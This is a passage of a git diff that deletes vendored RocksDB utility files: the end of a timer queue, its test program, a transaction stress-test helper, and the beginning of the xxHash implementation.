-      return std::make_pair(false, 0);
-    });
-    m_th.join();
-  }
-
-  // Adds a new timer
-  // \return
-  //  Returns the ID of the new timer. You can use this ID to cancel the
-  // timer
-  uint64_t add(int64_t milliseconds,
-               std::function<std::pair<bool, int64_t>(bool)> handler) {
-    WorkItem item;
-    Clock::time_point tp = Clock::now();
-    item.end = tp + std::chrono::milliseconds(milliseconds);
-    item.period = milliseconds;
-    item.handler = std::move(handler);
-
-    std::unique_lock<std::mutex> lk(m_mtx);
-    uint64_t id = ++m_idcounter;
-    item.id = id;
-    m_items.push(std::move(item));
-
-    // Something changed, so wake up timer thread
-    m_checkWork.notify_one();
-    return id;
-  }
-
-  // Cancels the specified timer
-  // \return
-  //  1 if the timer was cancelled.
-  //  0 if you were too late to cancel (or the timer ID was never valid to
-  // start with)
-  size_t cancel(uint64_t id) {
-    // Instead of removing the item from the container (thus breaking the
-    // heap integrity), we set the item as having no handler, and put
-    // that handler on a new item at the top for immediate execution
-    // The timer thread will then ignore the original item, since it has no
-    // handler.
-    std::unique_lock<std::mutex> lk(m_mtx);
-    for (auto&& item : m_items.getContainer()) {
-      if (item.id == id && item.handler) {
-        WorkItem newItem;
-        // Zero time, so it stays at the top for immediate execution
-        newItem.end = Clock::time_point();
-        newItem.id = 0;  // Means it is a canceled item
-        // Move the handler from item to newitem (thus clearing item)
-        newItem.handler = std::move(item.handler);
-        m_items.push(std::move(newItem));
-
-        // Something changed, so wake up timer thread
-        m_checkWork.notify_one();
-        return 1;
-      }
-    }
-    return 0;
-  }
-
-  // Cancels all timers
-  // \return
-  //  The number of timers cancelled
-  size_t cancelAll() {
-    // Setting all "end" to 0 (for immediate execution) is ok,
-    // since it maintains the heap integrity
-    std::unique_lock<std::mutex> lk(m_mtx);
-    m_cancel = true;
-    for (auto&& item : m_items.getContainer()) {
-      if (item.id && item.handler) {
-        item.end = Clock::time_point();
-        item.id = 0;
-      }
-    }
-    auto ret = m_items.size();
-
-    m_checkWork.notify_one();
-    return ret;
-  }
-
- private:
-  using Clock = std::chrono::steady_clock;
-  TimerQueue(const TimerQueue&) = delete;
-  TimerQueue& operator=(const TimerQueue&) = delete;
-
-  void run() {
-    std::unique_lock<std::mutex> lk(m_mtx);
-    while (!m_finish) {
-      auto end = calcWaitTime_lock();
-      if (end.first) {
-        // Timers found, so wait until it expires (or something else
-        // changes)
-        m_checkWork.wait_until(lk, end.second);
-      } else {
-        // No timers exist, so wait forever until something changes
-        m_checkWork.wait(lk);
-      }
-
-      // Check and execute as much work as possible, such as, all expired
-      // timers
-      checkWork(&lk);
-    }
-
-    // If we are shutting down, we should not have any items left,
-    // since the shutdown cancels all items
-    assert(m_items.size() == 0);
-  }
-
-  std::pair<bool, Clock::time_point> calcWaitTime_lock() {
-    while (m_items.size()) {
-      if (m_items.top().handler) {
-        // Item present, so return the new wait time
-        return std::make_pair(true, m_items.top().end);
-      } else {
-        // Discard empty handlers (they were cancelled)
-        m_items.pop();
-      }
-    }
-
-    // No items found, so return no wait time (causes the thread to wait
-    // indefinitely)
-    return std::make_pair(false, Clock::time_point());
-  }
-
-  void checkWork(std::unique_lock<std::mutex>* lk) {
-    while (m_items.size() && m_items.top().end <= Clock::now()) {
-      WorkItem item(m_items.top());
-      m_items.pop();
-
-      if (item.handler) {
-        (*lk).unlock();
-        auto reschedule_pair = item.handler(item.id == 0);
-        (*lk).lock();
-        if (!m_cancel && reschedule_pair.first) {
-          int64_t new_period = (reschedule_pair.second == -1)
-                                   ? item.period
-                                   : reschedule_pair.second;
-
-          item.period = new_period;
-          item.end = Clock::now() + std::chrono::milliseconds(new_period);
-          m_items.push(std::move(item));
-        }
-      }
-    }
-  }
-
-  bool m_finish = false;
-  bool m_cancel = false;
-  uint64_t m_idcounter = 0;
-  std::condition_variable m_checkWork;
-
-  struct WorkItem {
-    Clock::time_point end;
-    int64_t period;
-    uint64_t id;  // id==0 means it was cancelled
-    std::function<std::pair<bool, int64_t>(bool)> handler;
-    bool operator>(const WorkItem& other) const { return end > other.end; }
-  };
-
-  std::mutex m_mtx;
-  // Inheriting from priority_queue, so we can access the internal container
-  class Queue : public std::priority_queue<WorkItem, std::vector<WorkItem>,
-                                           std::greater<WorkItem>> {
-   public:
-    std::vector<WorkItem>& getContainer() { return this->c; }
-  } m_items;
-  rocksdb::port::Thread m_th;
-};
diff --git a/thirdparty/rocksdb/util/timer_queue_test.cc b/thirdparty/rocksdb/util/timer_queue_test.cc
deleted file mode 100644
index 5f5f08f..0000000
--- a/thirdparty/rocksdb/util/timer_queue_test.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-//  Portions Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-// borrowed from
-// http://www.crazygaze.com/blog/2016/03/24/portable-c-timer-queue/
-// Timer Queue
-//
-// License
-//
-// The source code in this article is licensed under the CC0 license, so feel
-// free
-// to copy, modify, share, do whatever you want with it.
-// No attribution is required, but Ill be happy if you do.
-// CC0 license
-
-// The person who associated a work with this deed has dedicated the work to the
-// public domain by waiving all of his or her rights to the work worldwide
-// under copyright law, including all related and neighboring rights, to the
-// extent allowed by law.  You can copy, modify, distribute and perform the
-// work, even for
-// commercial purposes, all without asking permission. See Other Information
-// below.
-//
-
-#include "util/timer_queue.h"
-#include <future>
-
-namespace Timing {
-
-using Clock = std::chrono::high_resolution_clock;
-double now() {
-  static auto start = Clock::now();
-  return std::chrono::duration<double, std::milli>(Clock::now() - start)
-      .count();
-}
-
-}  // namespace Timing
-
-int main() {
-  TimerQueue q;
-
-  double tnow = Timing::now();
-
-  q.add(10000, [tnow](bool aborted) mutable {
-    printf("T 1: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(false, 0);
-  });
-  q.add(10001, [tnow](bool aborted) mutable {
-    printf("T 2: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(false, 0);
-  });
-
-  q.add(1000, [tnow](bool aborted) mutable {
-    printf("T 3: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(!aborted, 1000);
-  });
-
-  auto id = q.add(2000, [tnow](bool aborted) mutable {
-    printf("T 4: %d, Elapsed %4.2fms\n", aborted, Timing::now() - tnow);
-    return std::make_pair(!aborted, 2000);
-  });
-
-  (void)id;
-  // auto ret = q.cancel(id);
-  // assert(ret == 1);
-  // q.cancelAll();
-
-  return 0;
-}
-//////////////////////////////////////////
diff --git a/thirdparty/rocksdb/util/transaction_test_util.cc b/thirdparty/rocksdb/util/transaction_test_util.cc
deleted file mode 100644
index 0d6948b..0000000
--- a/thirdparty/rocksdb/util/transaction_test_util.cc
+++ /dev/null
@@ -1,246 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include "util/transaction_test_util.h"
-
-#include <inttypes.h>
-#include <string>
-#include <thread>
-
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-RandomTransactionInserter::RandomTransactionInserter(
-    Random64* rand, const WriteOptions& write_options,
-    const ReadOptions& read_options, uint64_t num_keys, uint16_t num_sets)
-    : rand_(rand),
-      write_options_(write_options),
-      read_options_(read_options),
-      num_keys_(num_keys),
-      num_sets_(num_sets),
-      txn_id_(0) {}
-
-RandomTransactionInserter::~RandomTransactionInserter() {
-  if (txn_ != nullptr) {
-    delete txn_;
-  }
-  if (optimistic_txn_ != nullptr) {
-    delete optimistic_txn_;
-  }
-}
-
-bool RandomTransactionInserter::TransactionDBInsert(
-    TransactionDB* db, const TransactionOptions& txn_options) {
-  txn_ = db->BeginTransaction(write_options_, txn_options, txn_);
-
-  return DoInsert(nullptr, txn_, false);
-}
-
-bool RandomTransactionInserter::OptimisticTransactionDBInsert(
-    OptimisticTransactionDB* db,
-    const OptimisticTransactionOptions& txn_options) {
-  optimistic_txn_ =
-      db->BeginTransaction(write_options_, txn_options, optimistic_txn_);
-
-  return DoInsert(nullptr, optimistic_txn_, true);
-}
-
-bool RandomTransactionInserter::DBInsert(DB* db) {
-  return DoInsert(db, nullptr, false);
-}
-
-bool RandomTransactionInserter::DoInsert(DB* db, Transaction* txn,
-                                         bool is_optimistic) {
-  Status s;
-  WriteBatch batch;
-  std::string value;
-
-  // pick a random number to use to increment a key in each set
-  uint64_t incr = (rand_->Next() % 100) + 1;
-
-  bool unexpected_error = false;
-
-  // For each set, pick a key at random and increment it
-  for (uint8_t i = 0; i < num_sets_; i++) {
-    uint64_t int_value = 0;
-    char prefix_buf[5];
-    // prefix_buf needs to be large enough to hold a uint16 in string form
-
-    // key format:  [SET#][random#]
-    std::string rand_key = ToString(rand_->Next() % num_keys_);
-    Slice base_key(rand_key);
-
-    // Pad prefix appropriately so we can iterate over each set
-    snprintf(prefix_buf, sizeof(prefix_buf), "%.4u", i + 1);
-    std::string full_key = std::string(prefix_buf) + base_key.ToString();
-    Slice key(full_key);
-
-    if (txn != nullptr) {
-      s = txn->GetForUpdate(read_options_, key, &value);
-    } else {
-      s = db->Get(read_options_, key, &value);
-    }
-
-    if (s.ok()) {
-      // Found key, parse its value
-      int_value = std::stoull(value);
-
-      if (int_value == 0 || int_value == ULONG_MAX) {
-        unexpected_error = true;
-        fprintf(stderr, "Get returned unexpected value: %s\n", value.c_str());
-        s = Status::Corruption();
-      }
-    } else if (s.IsNotFound()) {
-      // Have not yet written to this key, so assume its value is 0
-      int_value = 0;
-      s = Status::OK();
-    } else {
-      // Optimistic transactions should never return non-ok status here.
-      // Non-optimistic transactions may return write-coflict/timeout errors.
-      if (is_optimistic || !(s.IsBusy() || s.IsTimedOut() || s.IsTryAgain())) {
-        fprintf(stderr, "Get returned an unexpected error: %s\n",
-                s.ToString().c_str());
-        unexpected_error = true;
-      }
-      break;
-    }
-
-    if (s.ok()) {
-      // Increment key
-      std::string sum = ToString(int_value + incr);
-      if (txn != nullptr) {
-        s = txn->Put(key, sum);
-        if (!s.ok()) {
-          // Since we did a GetForUpdate, Put should not fail.
-          fprintf(stderr, "Put returned an unexpected error: %s\n",
-                  s.ToString().c_str());
-          unexpected_error = true;
-        }
-      } else {
-        batch.Put(key, sum);
-      }
-    }
-  }
-
-  if (s.ok()) {
-    if (txn != nullptr) {
-      std::hash<std::thread::id> hasher;
-      char name[64];
-      snprintf(name, 64, "txn%zu-%d", hasher(std::this_thread::get_id()),
-               txn_id_++);
-      assert(strlen(name) < 64 - 1);
-      txn->SetName(name);
-      s = txn->Prepare();
-      s = txn->Commit();
-
-      if (!s.ok()) {
-        if (is_optimistic) {
-          // Optimistic transactions can have write-conflict errors on commit.
-          // Any other error is unexpected.
-          if (!(s.IsBusy() || s.IsTimedOut() || s.IsTryAgain())) {
-            unexpected_error = true;
-          }
-        } else {
-          // Non-optimistic transactions should only fail due to expiration
-          // or write failures.  For testing purproses, we do not expect any
-          // write failures.
-          if (!s.IsExpired()) {
-            unexpected_error = true;
-          }
-        }
-
-        if (unexpected_error) {
-          fprintf(stderr, "Commit returned an unexpected error: %s\n",
-                  s.ToString().c_str());
-        }
-      }
-
-    } else {
-      s = db->Write(write_options_, &batch);
-      if (!s.ok()) {
-        unexpected_error = true;
-        fprintf(stderr, "Write returned an unexpected error: %s\n",
-                s.ToString().c_str());
-      }
-    }
-  } else {
-    if (txn != nullptr) {
-      txn->Rollback();
-    }
-  }
-
-  if (s.ok()) {
-    success_count_++;
-  } else {
-    failure_count_++;
-  }
-
-  last_status_ = s;
-
-  // return success if we didn't get any unexpected errors
-  return !unexpected_error;
-}
-
-Status RandomTransactionInserter::Verify(DB* db, uint16_t num_sets) {
-  uint64_t prev_total = 0;
-
-  // For each set of keys with the same prefix, sum all the values
-  for (uint32_t i = 0; i < num_sets; i++) {
-    char prefix_buf[6];
-    snprintf(prefix_buf, sizeof(prefix_buf), "%.4u", i + 1);
-    uint64_t total = 0;
-
-    Iterator* iter = db->NewIterator(ReadOptions());
-
-    for (iter->Seek(Slice(prefix_buf, 4)); iter->Valid(); iter->Next()) {
-      Slice key = iter->key();
-
-      // stop when we reach a different prefix
-      if (key.ToString().compare(0, 4, prefix_buf) != 0) {
-        break;
-      }
-
-      Slice value = iter->value();
-      uint64_t int_value = std::stoull(value.ToString());
-      if (int_value == 0 || int_value == ULONG_MAX) {
-        fprintf(stderr, "Iter returned unexpected value: %s\n",
-                value.ToString().c_str());
-        return Status::Corruption();
-      }
-
-      total += int_value;
-    }
-    delete iter;
-
-    if (i > 0) {
-      if (total != prev_total) {
-        fprintf(stderr,
-                "RandomTransactionVerify found inconsistent totals. "
-                "Set[%" PRIu32 "]: %" PRIu64 ", Set[%" PRIu32 "]: %" PRIu64
-                " \n",
-                i - 1, prev_total, i, total);
-        return Status::Corruption();
-      }
-    }
-    prev_total = total;
-  }
-
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/transaction_test_util.h b/thirdparty/rocksdb/util/transaction_test_util.h
deleted file mode 100644
index 8805490..0000000
--- a/thirdparty/rocksdb/util/transaction_test_util.h
+++ /dev/null
@@ -1,114 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/options.h"
-#include "port/port.h"
-#include "rocksdb/utilities/optimistic_transaction_db.h"
-#include "rocksdb/utilities/transaction_db.h"
-
-namespace rocksdb {
-
-class DB;
-class Random64;
-
-// Utility class for stress testing transactions.  Can be used to write many
-// transactions in parallel and then validate that the data written is logically
-// consistent.  This class assumes the input DB is initially empty.
-//
-// Each call to TransactionDBInsert()/OptimisticTransactionDBInsert() will
-// increment the value of a key in #num_sets sets of keys.  Regardless of
-// whether the transaction succeeds, the total sum of values of keys in each
-// set is an invariant that should remain equal.
-//
-// After calling TransactionDBInsert()/OptimisticTransactionDBInsert() many
-// times, Verify() can be called to validate that the invariant holds.
-//
-// To test writing Transaction in parallel, multiple threads can create a
-// RandomTransactionInserter with similar arguments using the same DB.
-class RandomTransactionInserter {
- public:
-  // num_keys is the number of keys in each set.
-  // num_sets is the number of sets of keys.
-  explicit RandomTransactionInserter(
-      Random64* rand, const WriteOptions& write_options = WriteOptions(),
-      const ReadOptions& read_options = ReadOptions(), uint64_t num_keys = 1000,
-      uint16_t num_sets = 3);
-
-  ~RandomTransactionInserter();
-
-  // Increment a key in each set using a Transaction on a TransactionDB.
-  //
-  // Returns true if the transaction succeeded OR if any error encountered was
-  // expected (eg a write-conflict). Error status may be obtained by calling
-  // GetLastStatus();
-  bool TransactionDBInsert(
-      TransactionDB* db,
-      const TransactionOptions& txn_options = TransactionOptions());
-
-  // Increment a key in each set using a Transaction on an
-  // OptimisticTransactionDB
-  //
-  // Returns true if the transaction succeeded OR if any error encountered was
-  // expected (eg a write-conflict). Error status may be obtained by calling
-  // GetLastStatus();
-  bool OptimisticTransactionDBInsert(
-      OptimisticTransactionDB* db,
-      const OptimisticTransactionOptions& txn_options =
-          OptimisticTransactionOptions());
-  // Increment a key in each set without using a transaction.  If this function
-  // is called in parallel, then Verify() may fail.
-  //
-  // Returns true if the write succeeds.
-  // Error status may be obtained by calling GetLastStatus().
-  bool DBInsert(DB* db);
-
-  // Returns OK if Invariant is true.
-  static Status Verify(DB* db, uint16_t num_sets);
-
-  // Returns the status of the previous Insert operation
-  Status GetLastStatus() { return last_status_; }
-
-  // Returns the number of successfully written calls to
-  // TransactionDBInsert/OptimisticTransactionDBInsert/DBInsert
-  uint64_t GetSuccessCount() { return success_count_; }
-
-  // Returns the number of calls to
-  // TransactionDBInsert/OptimisticTransactionDBInsert/DBInsert that did not
-  // write any data.
-  uint64_t GetFailureCount() { return failure_count_; }
-
- private:
-  // Input options
-  Random64* rand_;
-  const WriteOptions write_options_;
-  const ReadOptions read_options_;
-  const uint64_t num_keys_;
-  const uint16_t num_sets_;
-
-  // Number of successful insert batches performed
-  uint64_t success_count_ = 0;
-
-  // Number of failed insert batches attempted
-  uint64_t failure_count_ = 0;
-
-  // Status returned by most recent insert operation
-  Status last_status_;
-
-  // optimization: re-use allocated transaction objects.
-  Transaction* txn_ = nullptr;
-  Transaction* optimistic_txn_ = nullptr;
-
-  std::atomic<int> txn_id_;
-
-  bool DoInsert(DB* db, Transaction* txn, bool is_optimistic);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/util/xxhash.cc b/thirdparty/rocksdb/util/xxhash.cc
deleted file mode 100644
index 4bce61a..0000000
--- a/thirdparty/rocksdb/util/xxhash.cc
+++ /dev/null
@@ -1,479 +0,0 @@
-/*
-xxHash - Fast Hash algorithm
-Copyright (C) 2012-2014, Yann Collet.
-BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php)
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are
-met:
-
-* Redistributions of source code must retain the above copyright
-notice, this list of conditions and the following disclaimer.
-* Redistributions in binary form must reproduce the above
-copyright notice, this list of conditions and the following disclaimer
-in the documentation and/or other materials provided with the
-distribution.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-You can contact the author at :
-- xxHash source repository : http://code.google.com/p/xxhash/
-*/
-
-
-//**************************************
-// Tuning parameters
-//**************************************
-// Unaligned memory access is automatically enabled for "common" CPU, such as x86.
-// For others CPU, the compiler will be more cautious, and insert extra code to ensure aligned access is respected.
-// If you know your target CPU supports unaligned memory access, you want to force this option manually to improve performance.
-// You can also enable this parameter if you know your input data will always be aligned (boundaries of 4, for U32).
-#if defined(__ARM_FEATURE_UNALIGNED) || defined(__i386) || defined(_M_IX86) || defined(__x86_64__) || defined(_M_X64)
-#  define XXH_USE_UNALIGNED_ACCESS 1
-#endif
-
-// XXH_ACCEPT_NULL_INPUT_POINTER :
-// If the input pointer is a null pointer, xxHash default behavior is to trigger a memory access error, since it is a bad pointer.
-// When this option is enabled, xxHash output for null input pointers will be the same as a null-length input.
-// This option has a very small performance cost (only measurable on small inputs).
-// By default, this option is disabled. To enable it, uncomment below define :
-//#define XXH_ACCEPT_NULL_INPUT_POINTER 1
-
-// XXH_FORCE_NATIVE_FORMAT :
-// By default, xxHash library provides endian-independent Hash values, based on little-endian convention.
-// Results are therefore identical for little-endian and big-endian CPU.
-// This comes at a performance cost for big-endian CPU, since some swapping is required to emulate little-endian format.
-// Should endian-independence be of no importance for your application, you may set the #define below to 1.
-// It will improve speed for Big-endian CPU.
-// This option has no impact on Little_Endian CPU.
-#define XXH_FORCE_NATIVE_FORMAT 0
-
-
-//**************************************
-// Compiler Specific Options
-//**************************************
-// Disable some Visual warning messages
-#ifdef _MSC_VER  // Visual Studio
-#  pragma warning(disable : 4127)      // disable: C4127: conditional expression is constant
-#  pragma warning(disable : 4804)      // disable: C4804: 'operation' : unsafe use of type 'bool' in operation (static assert line 313)
-#endif
-
-#ifdef _MSC_VER    // Visual Studio
-#  define FORCE_INLINE static __forceinline
-#else
-#  ifdef __GNUC__
-#    define FORCE_INLINE static inline __attribute__((always_inline))
-#  else
-#    define FORCE_INLINE static inline
-#  endif
-#endif
-
-
-//**************************************
-// Includes & Memory related functions
-//**************************************
-#include "xxhash.h"
-// Modify the local functions below should you wish to use some other memory related routines
-// for malloc(), free()
-#include <stdlib.h>
-FORCE_INLINE void* XXH_malloc(size_t s) { return malloc(s); }
-FORCE_INLINE void  XXH_free  (void* p)  { free(p); }
-// for memcpy()
-#include <string.h>
-FORCE_INLINE void* XXH_memcpy(void* dest, const void* src, size_t size) { return memcpy(dest,src,size); }
-
-
-namespace rocksdb {
-//**************************************
-// Basic Types
-//**************************************
-#if defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L   // C99
-# include <stdint.h>
-  typedef uint8_t  BYTE;
-  typedef uint16_t U16;
-  typedef uint32_t U32;
-  typedef  int32_t S32;
-  typedef uint64_t U64;
-#else
-  typedef unsigned char      BYTE;
-  typedef unsigned short     U16;
-  typedef unsigned int       U32;
-  typedef   signed int       S32;
-  typedef unsigned long long U64;
-#endif
-
-#if defined(__GNUC__)  && !defined(XXH_USE_UNALIGNED_ACCESS)
-#  define _PACKED __attribute__ ((packed))
-#else
-#  define _PACKED
-#endif
-
-#if !defined(XXH_USE_UNALIGNED_ACCESS) && !defined(__GNUC__)
-#  ifdef __IBMC__
-#    pragma pack(1)
-#  else
-#    pragma pack(push, 1)
-#  endif
-#endif
-
-typedef struct _U32_S { U32 v; } _PACKED U32_S;
-
-#if !defined(XXH_USE_UNALIGNED_ACCESS) && !defined(__GNUC__)
-#  pragma pack(pop)
-#endif
-
-#define A32(x) (((U32_S *)(x))->v)
-
-
-//***************************************
-// Compiler-specific Functions and Macros
-//***************************************
-#define GCC_VERSION (__GNUC__ * 100 + __GNUC_MINOR__)
-
-// Note : although _rotl exists for minGW (GCC under windows), performance seems poor
-#if defined(_MSC_VER)
-#  define XXH_rotl32(x,r) _rotl(x,r)
-#else
-#  define XXH_rotl32(x,r) ((x << r) | (x >> (32 - r)))
-#endif
-
-#if defined(_MSC_VER)     // Visual Studio
-#  define XXH_swap32 _byteswap_ulong
-#elif GCC_VERSION >= 403
-#  define XXH_swap32 __builtin_bswap32
-#else
-static inline U32 XXH_swap32 (U32 x) {
-    return  ((x << 24) & 0xff000000 ) |
-        ((x <<  8) & 0x00ff0000 ) |
-        ((x >>  8) & 0x0000ff00 ) |
-        ((x >> 24) & 0x000000ff );}
-#endif
-
-
-//**************************************
-// Constants
-//**************************************
-#define PRIME32_1   2654435761U
-#define PRIME32_2   2246822519U
-#define PRIME32_3   3266489917U
-#define PRIME32_4    668265263U
-#define PRIME32_5    374761393U
-
-
-//**************************************
-// Architecture Macros
-//**************************************
-typedef enum { XXH_bigEndian=0, XXH_littleEndian=1 } XXH_endianess;
-#ifndef XXH_CPU_LITTLE_ENDIAN   // It is possible to define XXH_CPU_LITTLE_ENDIAN externally, for example using a compiler switch
-    static const int one = 1;
-#   define XXH_CPU_LITTLE_ENDIAN   (*(char*)(&one))
-#endif
-
-
-//**************************************
-// Macros
-//**************************************
-#define XXH_STATIC_ASSERT(c)   { enum { XXH_static_assert = 1/(!!(c)) }; }    // use only *after* variable declarations
-
-
-//****************************
-// Memory reads
-//****************************
-typedef enum { XXH_aligned, XXH_unaligned } XXH_alignment;
-
-FORCE_INLINE U32 XXH_readLE32_align(const U32* ptr, XXH_endianess endian, XXH_alignment align)
-{
-    if (align==XXH_unaligned)
-        return endian==XXH_littleEndian ? A32(ptr) : XXH_swap32(A32(ptr));
-    else
-        return endian==XXH_littleEndian ? *ptr : XXH_swap32(*ptr);
-}
-
-FORCE_INLINE U32 XXH_readLE32(const U32* ptr, XXH_endianess endian) { return XXH_readLE32_align(ptr, endian, XXH_unaligned); }
-
-
-//****************************
-// Simple Hash Functions
-//****************************
-FORCE_INLINE U32 XXH32_endian_align(const void* input, int len, U32 seed, XXH_endianess endian, XXH_alignment align)
-{
-    const BYTE* p = (const BYTE*)input;
-    const BYTE* const bEnd = p + len;
-    U32 h32;
-
-#ifdef XXH_ACCEPT_NULL_INPUT_POINTER
-    if (p==NULL) { len=0; p=(const BYTE*)(size_t)16; }
-#endif
-
-    if (len>=16)
-    {
-        const BYTE* const limit = bEnd - 16;
-        U32 v1 = seed + PRIME32_1 + PRIME32_2;
-        U32 v2 = seed + PRIME32_2;
-        U32 v3 = seed + 0;
-        U32 v4 = seed - PRIME32_1;
-
-        do
-        {
-            v1 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v1 = XXH_rotl32(v1, 13); v1 *= PRIME32_1; p+=4;
-            v2 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v2 = XXH_rotl32(v2, 13); v2 *= PRIME32_1; p+=4;
-            v3 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v3 = XXH_rotl32(v3, 13); v3 *= PRIME32_1; p+=4;
-            v4 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_2; v4 = XXH_rotl32(v4, 13); v4 *= PRIME32_1; p+=4;
-        } while (p<=limit);
-
-        h32 = XXH_rotl32(v1, 1) + XXH_rotl32(v2, 7) + XXH_rotl32(v3, 12) + XXH_rotl32(v4, 18);
-    }
-    else
-    {
-        h32  = seed + PRIME32_5;
-    }
-
-    h32 += (U32) len;
-
-    while (p<=bEnd-4)
-    {
-        h32 += XXH_readLE32_align((const U32*)p, endian, align) * PRIME32_3;
-        h32  = XXH_rotl32(h32, 17) * PRIME32_4 ;
-        p+=4;
-    }
-
-    while (p<bEnd)
-    {
-        h32 += (*p) * PRIME32_5;
-        h32 = XXH_rotl32(h32, 11) * PRIME32_1 ;
-        p++;
-    }
-
-    h32 ^= h32 >> 15;
-    h32 *= PRIME32_2;
-    h32 ^= h32 >> 13;
-    h32 *= PRIME32_3;
-    h32 ^= h32 >> 16;
-
-    return h32;
-}
-
-
-U32 XXH32(const void* input, int len, U32 seed)
-{
-#if 0
-    // Simple version, good for code maintenance, but unfortunately slow for small inputs
-    void* state = XXH32_init(seed);
-    XXH32_update(state, input, len);
-    return XXH32_digest(state);
-#else
-    XXH_endianess endian_detected = (XXH_endianess)XXH_CPU_LITTLE_ENDIAN;
-
-#  if !defined(XXH_USE_UNALIGNED_ACCESS)
-    if ((((size_t)input) & 3))   // Input is aligned, let's leverage the speed advantage
-    {
-        if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-            return XXH32_endian_align(input, len, seed, XXH_littleEndian, XXH_aligned);
-        else
-            return XXH32_endian_align(input, len, seed, XXH_bigEndian, XXH_aligned);
-    }
-#  endif
-
-    if ((endian_detected==XXH_littleEndian) || XXH_FORCE_NATIVE_FORMAT)
-        return XXH32_endian_align(input, len, seed, XXH_littleEndian, XXH_unaligned);
-    else
-        return XXH32_endian_align(input, len, seed, XXH_bigEndian, XXH_unaligned);
-#endif
-}
-
-
-//****************************
-// Advanced Hash Functions
-//****************************
-
-struct XXH_state32_t
-{
-    U64 total_len;
-    U32 seed;
-    U32 v1;
-    U32 v2;
-    U32 v3;
-    U32 v4;
-    int memsize;
-    char memory[16];
-};
-
-
-int XXH32_sizeofState()
-{
-    XXH_STATIC_ASSERT(XXH32_SIZEOFSTATE >= sizeof(struct XXH_state32_t));   // A compilation error here means XXH32_SIZEOFSTATE is not large enough
-    return sizeof(struct XXH_state32_t);
-}
-
-
-XXH_errorcode XXH32_resetState(void* state_in, U32 seed)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    state->seed = seed;
-    state->v1 = seed + PRIME32_1 + PRIME32_2;
-    state->v2 = seed + PRIME32_2;
-    state->v3 = seed + 0;
-    state->v4 = seed - PRIME32_1;
-    state->total_len = 0;
-    state->memsize = 0;
-    return XXH_OK;
-}
-
-
-void* XXH32_init (U32 seed)
-{
-    void* state = XXH_malloc (sizeof(struct XXH_state32_t));
-    XXH32_resetState(state, seed);
-    return state;
-}
-
-
-FORCE_INLINE XXH_errorcode XXH32_update_endian (void* state_in, const void* input, int len, XXH_endianess endian)
-{
-    struct XXH_state32_t * state = (struct XXH_state32_t *) state_in;
-    const BYTE* p = (const BYTE*)input;
-    const BYTE* const bEnd = p + len;
-
-#ifdef XXH_ACCEPT_NULL_INPUT_POINTER
-    if (input==NULL) return XXH_ERROR;
-#endif
-
-    state->total_len += len;
-
-    if (state->memsize + len < 16)   // fill in tmp buffer
-    {
-        XXH_memcpy(state->memory + state->memsize, input, len);
-        state->memsize +=  len;
-        return XXH_OK;
-    }
-
-    if (state->memsize)   // some data left from previous update
-    {
-        XXH_memcpy(state->memory + state->memsize, input, 16-state->memsize);
-        {
-            const U32* p32 = (const U32*)state->memory;
-            state->v1 += XXH_readLE32(p32, endian) * PRIME32_2; state->v1 = XXH_rotl32(state->v1, 13); state->v1 *= PRIME32_1; p32++;
-            state->v2 += XXH_readLE32(p32, endian) * PRIME32_2; state->v2 = XXH_rotl32(state->v2, 13); state->v2 *= PRIME32_1; p32++;
